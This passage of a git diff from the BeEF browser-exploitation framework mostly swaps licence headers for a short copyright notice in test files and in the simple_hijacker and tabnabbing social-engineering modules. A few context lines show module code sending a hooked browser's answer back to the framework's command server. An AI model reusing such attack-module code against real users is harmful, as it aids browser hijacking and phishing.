-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 hijack = function(){
     function send(answer){
       beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);	
diff --git a/modules/social_engineering/simple_hijacker/config.yaml b/modules/social_engineering/simple_hijacker/config.yaml
index b131f91ba..b43fa8a3e 100644
--- a/modules/social_engineering/simple_hijacker/config.yaml
+++ b/modules/social_engineering/simple_hijacker/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/social_engineering/simple_hijacker/module.rb b/modules/social_engineering/simple_hijacker/module.rb
index 6a40a85ed..c2df85220 100644
--- a/modules/social_engineering/simple_hijacker/module.rb
+++ b/modules/social_engineering/simple_hijacker/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Simple_hijacker < BeEF::Core::Command
 
diff --git a/modules/social_engineering/tabnabbing/command.js b/modules/social_engineering/tabnabbing/command.js
index bb6ee8c16..4f122a166 100644
--- a/modules/social_engineering/tabnabbing/command.js
+++ b/modules/social_engineering/tabnabbing/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var url = "<%= @url %>";
diff --git a/modules/social_engineering/tabnabbing/config.yaml b/modules/social_engineering/tabnabbing/config.yaml
index 0a35fced7..746618b2b 100644
--- a/modules/social_engineering/tabnabbing/config.yaml
+++ b/modules/social_engineering/tabnabbing/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/social_engineering/tabnabbing/module.rb b/modules/social_engineering/tabnabbing/module.rb
index a18c4e13f..8320eb20e 100644
--- a/modules/social_engineering/tabnabbing/module.rb
+++ b/modules/social_engineering/tabnabbing/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Tabnabbing < BeEF::Core::Command
   
diff --git a/test/common/ts_common.rb b/test/common/ts_common.rb
index b1a0a8b6e..6dcd8c466 100644
--- a/test/common/ts_common.rb
+++ b/test/common/ts_common.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # @note Version check to ensure BeEF is running Ruby 1.9 >
diff --git a/test/integration/ts_integration.rb b/test/integration/ts_integration.rb
index c9c74f389..b16c9ec29 100644
--- a/test/integration/ts_integration.rb
+++ b/test/integration/ts_integration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # Common lib for BeEF tests
diff --git a/test/thirdparty/msf/unit/tc_metasploit.rb b/test/thirdparty/msf/unit/tc_metasploit.rb
index 84e7b3a1f..f3ed69bd9 100644
--- a/test/thirdparty/msf/unit/tc_metasploit.rb
+++ b/test/thirdparty/msf/unit/tc_metasploit.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 require 'pp'
diff --git a/test/thirdparty/msf/unit/ts_metasploit.rb b/test/thirdparty/msf/unit/ts_metasploit.rb
index 84b20ff3e..9e0448baf 100644
--- a/test/thirdparty/msf/unit/ts_metasploit.rb
+++ b/test/thirdparty/msf/unit/ts_metasploit.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # Common lib for BeEF tests
diff --git a/test/unit/core/filter/tc_base.rb b/test/unit/core/filter/tc_base.rb
index f7fed555d..d31036bb3 100644
--- a/test/unit/core/filter/tc_base.rb
+++ b/test/unit/core/filter/tc_base.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/core/filter/tc_command.rb b/test/unit/core/filter/tc_command.rb
index d103750be..a0983af32 100644
--- a/test/unit/core/filter/tc_command.rb
+++ b/test/unit/core/filter/tc_command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/core/main/network_stack/handlers/dynamicreconstruction.rb b/test/unit/core/main/network_stack/handlers/dynamicreconstruction.rb
index 7c42b1e29..dfbf553ac 100644
--- a/test/unit/core/main/network_stack/handlers/dynamicreconstruction.rb
+++ b/test/unit/core/main/network_stack/handlers/dynamicreconstruction.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 require 'rubygems'
diff --git a/test/unit/core/tc_api.rb b/test/unit/core/tc_api.rb
index e77d40e9a..9500f51d0 100644
--- a/test/unit/core/tc_api.rb
+++ b/test/unit/core/tc_api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/core/tc_autorun.rb b/test/unit/core/tc_autorun.rb
index 515158212..2095d4276 100644
--- a/test/unit/core/tc_autorun.rb
+++ b/test/unit/core/tc_autorun.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/core/tc_bootstrap.rb b/test/unit/core/tc_bootstrap.rb
index 1f4a1f525..5c1c75daf 100644
--- a/test/unit/core/tc_bootstrap.rb
+++ b/test/unit/core/tc_bootstrap.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/core/tc_core.rb b/test/unit/core/tc_core.rb
index a41910286..28809675c 100644
--- a/test/unit/core/tc_core.rb
+++ b/test/unit/core/tc_core.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/core/tc_loader.rb b/test/unit/core/tc_loader.rb
index 7d19f40d0..d241de1aa 100644
--- a/test/unit/core/tc_loader.rb
+++ b/test/unit/core/tc_loader.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/core/tc_logger.rb b/test/unit/core/tc_logger.rb
index ca04afa39..20352e8ce 100644
--- a/test/unit/core/tc_logger.rb
+++ b/test/unit/core/tc_logger.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/core/tc_modules.rb b/test/unit/core/tc_modules.rb
index 43c2f95f0..02157235f 100644
--- a/test/unit/core/tc_modules.rb
+++ b/test/unit/core/tc_modules.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/core/tc_obfuscation.rb b/test/unit/core/tc_obfuscation.rb
index 52579b595..984cb1819 100644
--- a/test/unit/core/tc_obfuscation.rb
+++ b/test/unit/core/tc_obfuscation.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/core/tc_social_engineering.rb b/test/unit/core/tc_social_engineering.rb
index cf2a40a02..c88acbc76 100644
--- a/test/unit/core/tc_social_engineering.rb
+++ b/test/unit/core/tc_social_engineering.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/extensions/tc_event_logger.rb b/test/unit/extensions/tc_event_logger.rb
index 38cfbb872..c73a90332 100644
--- a/test/unit/extensions/tc_event_logger.rb
+++ b/test/unit/extensions/tc_event_logger.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/extensions/tc_hackverter.rb b/test/unit/extensions/tc_hackverter.rb
index 50492cdac..18b69f7fc 100644
--- a/test/unit/extensions/tc_hackverter.rb
+++ b/test/unit/extensions/tc_hackverter.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/extensions/tc_hooks.rb b/test/unit/extensions/tc_hooks.rb
index 019211c25..708522f39 100644
--- a/test/unit/extensions/tc_hooks.rb
+++ b/test/unit/extensions/tc_hooks.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/extensions/tc_ipec_tunnel.rb b/test/unit/extensions/tc_ipec_tunnel.rb
index 543e0b39b..205080c9d 100644
--- a/test/unit/extensions/tc_ipec_tunnel.rb
+++ b/test/unit/extensions/tc_ipec_tunnel.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/extensions/tc_proxy.rb b/test/unit/extensions/tc_proxy.rb
index daf63805d..3bf37896b 100644
--- a/test/unit/extensions/tc_proxy.rb
+++ b/test/unit/extensions/tc_proxy.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/extensions/tc_requester.rb b/test/unit/extensions/tc_requester.rb
index a03141826..cc30942aa 100644
--- a/test/unit/extensions/tc_requester.rb
+++ b/test/unit/extensions/tc_requester.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/extensions/tc_vnc.rb b/test/unit/extensions/tc_vnc.rb
index 43be80dcd..33f4db648 100644
--- a/test/unit/extensions/tc_vnc.rb
+++ b/test/unit/extensions/tc_vnc.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/extensions/tc_xssrays.rb b/test/unit/extensions/tc_xssrays.rb
index 10deec4e6..4d9cbf463 100644
--- a/test/unit/extensions/tc_xssrays.rb
+++ b/test/unit/extensions/tc_xssrays.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/tc_filesystem.rb b/test/unit/tc_filesystem.rb
index ca56f0bc7..6cb1d893e 100644
--- a/test/unit/tc_filesystem.rb
+++ b/test/unit/tc_filesystem.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/tc_grep.rb b/test/unit/tc_grep.rb
index 3fbd95135..a9d086fdd 100644
--- a/test/unit/tc_grep.rb
+++ b/test/unit/tc_grep.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
